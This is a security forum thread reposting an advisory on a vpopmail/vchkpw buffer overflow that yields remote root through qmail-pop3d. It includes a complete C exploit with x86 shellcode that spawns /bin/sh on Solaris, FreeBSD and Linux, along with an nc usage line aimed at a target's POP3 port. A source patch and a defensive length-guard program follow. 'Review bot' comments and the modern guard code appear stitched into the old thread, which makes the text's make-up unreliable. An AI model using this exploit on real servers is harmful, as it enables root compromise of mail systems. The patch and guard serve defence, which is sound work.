
Thread: Qmail Addon exploit!!!

  1. #1
    instronics (Antionline's Security Dude)
    Join Date: Dec 2002
    Posts: 901

    Qmail Addon exploit!!!

    Dear AO.

    So far qmail has been a very safe mail server, and still continues to be one of my favourites. However, an addon for qmail has compromised this security.

    Vpopmail (qmail add-on) is vulnerable to remote root exploit (vpopmail, vchkpw)

    Summary:

    When the vpopmail qmail add-on is installed and used to authenticate user information, a remote attacker may compromise the machine by supplying a long argument to qmail (which passes it to vpopmail). A remote attacker may obtain the privilege level of the authentication module - usually root.

    Details:

    Qmail-pop3d assumes that its password-check mechanism will support the long password that is passed to it. While according to RFC 1939 (Post Office Protocol version 3) POP3 arguments should be no longer than 40 characters, qmail supports longer passwords, and therefore it's possible to pass vpopmail (a specific password verification mechanism) passwords which are longer than it expects, causing a buffer overflow.

    Vulnerable systems:
    All VPopmail versions prior to VPopmail 3.4.11j.

    Immune systems:
    VPopmail 3.4.11j

    Exploit:
    /*
    qmail-qpop3d-vchkpw.c (v.3)
    by: K2,

    The inter7 supported vchkpw/vpopmail package (replacement for chkeckpasswd)
    has big problems ;)

    gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
    ( ./vpop [offset] [alignment] ; cat ) | nc target.com 110

    play with the alignment to get it to A) crash B) work.
    qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for now.
    Tested agenst: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE
    vpopmail-3.4.10a/vpopmail-3.4.11[b-e]

    Hi plaguez.
    prop's to Interrupt for testing with bsd, _eixon an others ;)
    cheez shell's :)
    THX goes out to STARBUCKS*!($#!
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define SIZE 260            /* total length of the USER argument sent to the server */
    #define NOP 0x90            /* x86 NOP, fills the sled in front of the shellcode */
    #ifdef SX86
    #define DEFOFF 0x8047cfc    /* guessed stack address, Solaris/x86 */
    #define NOPDEF 75
    #elif BSD
    #define DEFOFF 0xbfbfdbbf   /* guessed stack address, FreeBSD/x86 */
    #define NOPDEF 81
    #else
    #define DEFOFF 0xbffffcd8   /* guessed stack address, Linux/x86 */
    #define NOPDEF 81
    #endif

    const char *shell =
    #ifdef SX86 // Solaris IA32 shellcode, cheez
    "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
    "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
    "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
    "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
    "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
    "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
    #elif BSD // fBSD shellcode, mudge@l0pht.com
    "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
    "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
    "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
    "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
    #else // Linux shellcode, no idea
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh\xff";
    #endif

    int main(int argc, char **argv)
    {
    int i=0,esp=0,offset=0,nop=NOPDEF;
    char buffer[SIZE+1];        /* one extra byte so the payload is NUL-terminated for %s */

    /* argv[1]: adjustment added to the guessed return address
       argv[2]: adjustment to the NOP sled length (shifts where the shellcode lands) */
    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtol(argv[2], NULL, 0);
    if (nop < 0 || nop + strlen(shell) + 1 >= SIZE) {
    fprintf(stderr,"alignment out of range\n");
    return(1);
    }

    esp = DEFOFF;

    /* layout: [NOP sled][shellcode][guessed return address repeated to the end] */
    memset(buffer, NOP, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));
    for (i = (nop+strlen(shell)+1); i + (int)sizeof(int) <= SIZE; i += 4) {
    *((int *) &buffer[i]) = esp+offset;   /* 32-bit little-endian address */
    }
    buffer[SIZE] = '\0';

    /* the oversized USER argument is what reaches vchkpw; the PASS value is arbitrary */
    printf("user %s\n",buffer);
    printf("pass ADMR0X&*!(#&*(!\n");

    fprintf(stderr,"\nbuflen = %d, nops = %d, target = 0x%x\n\n",(int)strlen(buffer),nop,esp+offset);
    return(0);
    }

    Patch:
    --- qmail-1.03/qmail-popup.c Mon Jun 15 03:53:16 1998
    +++ qmail-1.03-patch/qmail-popup.c Fri Jan 21 13:00:18 2000
    @@ -13,6 +13,8 @@
    #include "readwrite.h"
    #include "timeoutread.h"
    #include "timeoutwrite.h"
    +#include <unistd.h>
    +#include <syslog.h>

    void die() { _exit(1); }

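    Review bot: <syslog.h> is added but no openlog() call goes with it, so the syslog() notices in the next hunk are emitted under the default ident and LOG_USER facility rather than as qmail-popup under LOG_MAIL; add openlog("qmail-popup", LOG_PID, LOG_MAIL) before the first syslog(), or, to stay with qmail's conventions (it logs to stderr and does not otherwise use syslog), write the notice to stderr instead and drop both new includes. The new code also calls strlen() without including <string.h>; qmail's own str_len() from str.h would be the consistent choice.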
    @@ -87,6 +89,24 @@
    int child;
    int wstat;
    int pi[2];
    +
    + /*
    + This patch should have minimal impact of normal qmail operations.
    + It was coded/tested under linux, but should work most everywhere.
    + */
    +
    + if(strlen(user) >= 40)
    + {
    + syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(user));
    + user[39]='\0';
    + userlen=strlen(user);
    + }
    +
    + if(strlen(pass) >= 40)
    + {
    + syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(pass));
    + pass[39]='\0';
    + }

    if (fd_copy(2,1) == -1) die_pipe();
    close(3);
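    Review bot: `userlen=strlen(user);` in the user branch looks off by one: the hunk does not show how userlen is defined, but in qmail-1.03 the userlen parameter of this function counts the terminating 0 byte (user and pass are written to the checkpassword child on fd 3 as two NUL-terminated strings), so after truncation it should be strlen(user)+1 or the NUL separating user from pass is lost; check the parameter's comment before merging. The pass branch has no such line only because the pass length is recomputed later. Separately, truncating instead of rejecting is the wrong failure mode: a 45-character USER is silently turned into the 39-character account that is its prefix and the login proceeds against the wrong mailbox, and exact 40-character arguments, which RFC 1939 allows, are cut as well because the test is >= 40. Prefer answering -ERR and calling die() when either argument exceeds 40 characters, before the fork, and have the two log lines say which argument tripped the check rather than only its length.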


    Download the latest version of vpopmail from: http://www.inter7.com/vpopmail/

    The information was provided by: k2.

    I hope this information comes in handy for people using qmail with the vpopmail addon.


    Cheers.
    Ubuntu-: Means in African : "Im too dumb to use Slackware"
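A worked guard for the failure mode the advisory above describes (an overlong USER/PASS argument handed straight to a verifier that copies it into a fixed-size buffer), as an added example for this thread. It is not qmail-popup.c, vpopmail or vchkpw code: the 64-byte buffer, the function names and the "alice" / "correct horse" fixture are assumptions made for the illustration, and it rejects oversize arguments with -ERR rather than truncating them the way the posted patch does.

```c
/* pop3guard.c: added example, not code from qmail or vpopmail.
 * Shows (a) the fixed-buffer copy the advisory describes, (b) an RFC 1939
 * argument guard that fails closed, and (c) a tiny USER/PASS handler that
 * replies -ERR instead of passing oversize data on to the verifier. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define POP3_MAX_ARG 40   /* RFC 1939: arguments are at most 40 characters */
#define PW_BUF       64   /* assumed size of the verifier's stack buffer (hypothetical) */

enum { GUARD_OK = 0, GUARD_TOO_LONG = -1, GUARD_BAD_CHAR = -2 };

/* Accept an argument only if it is what the protocol allows: up to 40
 * printable ASCII characters. Rejecting (rather than truncating) keeps
 * "aaaa...aaaX" from silently becoming the shorter account "aaaa...aaa". */
int pop3_guard_arg(const char *arg, size_t len)
{
    size_t i;
    if (len > POP3_MAX_ARG) return GUARD_TOO_LONG;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (c < 0x20 || c > 0x7e) return GUARD_BAD_CHAR;
    }
    return GUARD_OK;
}

/* The pattern the advisory describes: the verifier assumes the front end only
 * passes short strings and strcpy()s into a fixed buffer. Instead of doing the
 * copy, report how many bytes would land past the end (0 = no overflow). */
size_t unchecked_copy_overrun(const char *pass)
{
    size_t need = strlen(pass) + 1;          /* bytes strcpy() would write */
    return need > PW_BUF ? need - PW_BUF : 0;
}

/* Hardened shape of the same verifier: bound everything before the copy.
 * The stored credential is a constructed fixture, not a real lookup. */
int checked_verify(const char *user, const char *pass)
{
    char pwbuf[PW_BUF];
    if (pop3_guard_arg(user, strlen(user)) != GUARD_OK ||
        pop3_guard_arg(pass, strlen(pass)) != GUARD_OK)
        return 0;                             /* fail closed: caller sends -ERR */
    memcpy(pwbuf, pass, strlen(pass) + 1);    /* fits: at most 41 bytes < PW_BUF */
    return strcmp(user, "alice") == 0 && strcmp(pwbuf, "correct horse") == 0;
}

/* Minimal USER/PASS handler. Returns 1 when the line was accepted and writes
 * the reply the server would send into 'reply'. The length check happens
 * before the argument is ever handed to a checkpassword-style verifier. */
int pop3_handle(const char *line, char *reply, size_t replylen)
{
    char cmd[8];
    size_t clen = strcspn(line, " \r\n"), alen, i;
    const char *arg;

    if (clen == 0 || clen >= sizeof cmd) {
        snprintf(reply, replylen, "-ERR syntax error");
        return 0;
    }
    for (i = 0; i < clen; i++) cmd[i] = (char)toupper((unsigned char)line[i]);
    cmd[clen] = '\0';
    if (strcmp(cmd, "USER") != 0 && strcmp(cmd, "PASS") != 0) {
        snprintf(reply, replylen, "-ERR unknown command %s", cmd);
        return 0;
    }
    arg = line + clen;
    while (*arg == ' ') arg++;
    alen = strcspn(arg, "\r\n");
    switch (pop3_guard_arg(arg, alen)) {
    case GUARD_TOO_LONG:
        snprintf(reply, replylen, "-ERR argument too long (%zu > %d)", alen, POP3_MAX_ARG);
        return 0;
    case GUARD_BAD_CHAR:
        snprintf(reply, replylen, "-ERR argument contains non-printable bytes");
        return 0;
    default:
        snprintf(reply, replylen, "+OK %s accepted", cmd);
        return 1;
    }
}

int main(void)
{
    char attack[300], reply[80];
    size_t i;

    /* constructed input shaped like the posted exploit: "USER " + 260 NOP bytes */
    memcpy(attack, "USER ", 5);
    for (i = 0; i < 260; i++) attack[5 + i] = (char)0x90;
    memcpy(attack + 265, "\r\n", 3);

    printf("overrun of a %d-byte buffer by the exploit argument: %zu bytes\n",
           PW_BUF, unchecked_copy_overrun(attack + 5));
    pop3_handle(attack, reply, sizeof reply);
    printf("guarded server replies: %s\n", reply);
    pop3_handle("USER alice\r\n", reply, sizeof reply);
    printf("normal login: %s, verify=%d\n", reply, checked_verify("alice", "correct horse"));
    return 0;
}
```

Compile with `gcc -o pop3guard pop3guard.c` and run it: the unchecked copy of a 260-byte argument lands well past the end of the assumed 64-byte buffer, while the guarded handler answers `-ERR argument too long (260 > 40)` before the verifier sees a byte of it. The guard tests length before content on purpose, so an oversize binary payload is reported as too long rather than as a character-set error.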

  2. #2
    Senior Member
    Join Date: Oct 2001
    Posts: 186
    Thanks for the information, because I was thinking about running Qmail as an alternative to sendmail. I hadn't heard of this addon, but now I believe I'll look into it.
    Ben Franklin said it best. "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety."

  3. #3
    instronics (Antionline's Security Dude)
    Join Date: Dec 2002
    Posts: 901
    Do not misunderstand it. Qmail is a very safe mail server. The weakness applies to this specific addon. I prefer Qmail instead of sendmail. Sendmail is known to get exploited very often.

    Cheers.
    Ubuntu-: Means in African : "Im too dumb to use Slackware"
